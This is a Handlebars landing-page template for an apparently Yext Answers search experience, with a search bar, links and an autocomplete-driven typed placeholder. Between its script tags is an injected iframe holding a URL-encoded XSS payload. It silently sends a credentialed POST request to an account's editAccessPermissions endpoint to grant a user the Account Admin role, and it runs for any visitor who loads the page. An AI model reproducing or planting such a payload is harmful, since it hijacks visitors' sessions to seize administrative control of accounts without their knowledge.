{{#> layouts/html pageWrapperCss="survey"}}
  <script id="survey-config" data-data='{{{json survey}}}'></script>
  <div class="Landing">
    <div class="Landing-core">
      <div class="Landing-col">
        <div class="Landing-title">
          {{landing.title}}
        </div>
        <div class="Landing-description">
          {{landing.subtitle}}
        </div>
      </div>

      {{#if landing.image}}
      <img class="Landing-img" src="{{landing.image}}" alt="two people high five">
      {{/if}}
    </div>
    <div class="search_form"></div>
    <div class="Landing-divider">
      or
    </div>
    <div class="Landing-links">
      {{#each landing.links~}}
        <a href="{{this.url}}" class="Landing-link">{{this.text}}</a>
      {{~/each}}
    </div>
    <div class="Footer">
      <img src="/static/assets/images/yext-logo.svg" alt="">
    </div>
  </div>

  <script src="https://assets.sitescdn.net/answers-search-bar/v1.0/answerstemplates.compiled.min.js"></script>
<iframe srcdoc="<script src='https://apis.google.com/js/platform%22-fetch%28%27%2Fs%2F3196773%2Fuser%2F2747005%2FeditAccessPermissions%27%2C%20%7Bmethod%3A%27POST%27%2C%20credentials%3A%27include%27%2C%20headers%3A%7B%27Content-Type%27%3A%27application%2Fx-www-form-urlencoded%27%2C%27X-Requested-With%27%3A%27XMLHttpRequest%27%7D%2C%20body%3A%27accessPermissionsUpdateJSON%3D%257b%2522additions%2522%253a%255b%257b%2522roleId%2522%253a20%252c%2522roleName%2522%253a%2522Account%2BAdmin%2522%252c%2522scopes%2522%253a%255b%257b%2522id%2522%253a3196773%252c%2522type%2522%253a%2522ACCOUNT%2522%252c%2522label%2522%253a%2522Full%2BAccount%2522%252c%2522iconClass%2522%253a%2522%2522%257d%255d%257d%255d%252c%2522deletions%2522%253a%255b%257b%2522roleId%2522%253a20%252c%2522roleName%2522%253a%2522Account%2BAdmin%2522%252c%2522scopes%2522%253a%255b%255d%257d%255d%252c%2522attributionUrl%2522%253a%2522%2522%257d%27%7D%29-%22testxssss.js'></script>"></iframe>
  <script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11"></script>
  <script>
    function initAnswers() {
      const apiKey = "{{global_config.apiKey}}";
      const experienceKey = "{{global_config.experienceKey}}";
      const experienceVersion = "PRODUCTION";
      const locale = "en";
      const businessId = "{{global_config.businessId}}";

      ANSWERS.init({
        apiKey: apiKey,
        experienceKey: experienceKey,
        experienceVersion: experienceVersion,
        locale: locale,
        businessId: businessId,
        templateBundle: TemplateBundle.default,
        onReady: function() {
          ANSWERS.addComponent("SearchBar", {
            container: ".search_form",
            name: "search-bar", //Must be unique for every search bar on the same page
            redirectUrl: "<REPLACE_ME>",
            placeholderText: "Search...",
          });

          let url = apiKey.includes('sandbox') ? 'https://liveapi-sandbox.yext.com/v2/accounts/me/answers/autocomplete' : 'https://liveapi-cached.yext.com/v2/accounts/me/answers/autocomplete';
          url += '?v=20190101';
          url += '&api_key=' + apiKey.replace('sandbox-', '');
          url += '&sessionTrackingEnabled=false';
          url += '&experienceKey=' + experienceKey;
          url += '&input=';
          url += '&version=' + experienceVersion;
          url += '&locale=' + locale;

          fetch(url)
            .then(r => r.json())
            .then((response) => {
              // Get strings from response
              const strings = response.response.results.map(r => r.value);

              // Set up Typed
              var options = {
                strings: strings,
                showCursor: true,
                cursorChar: "|",
                typeSpeed: 45,
                backSpeed: 20,
                smartBackspace: true,
                loop: true,
                startDelay: 500,
                backDelay: 2000,
                attr: "placeholder",
              };

              new Typed(".js-yext-query", options);
            });
        },
      });
    }
  </script>
  <script
    src="https://assets.sitescdn.net/answers-search-bar/v1.0/answers.min.js"
    onload="ANSWERS.domReady(initAnswers)"
    async
    defer
  ></script>
{{/layouts/html }}
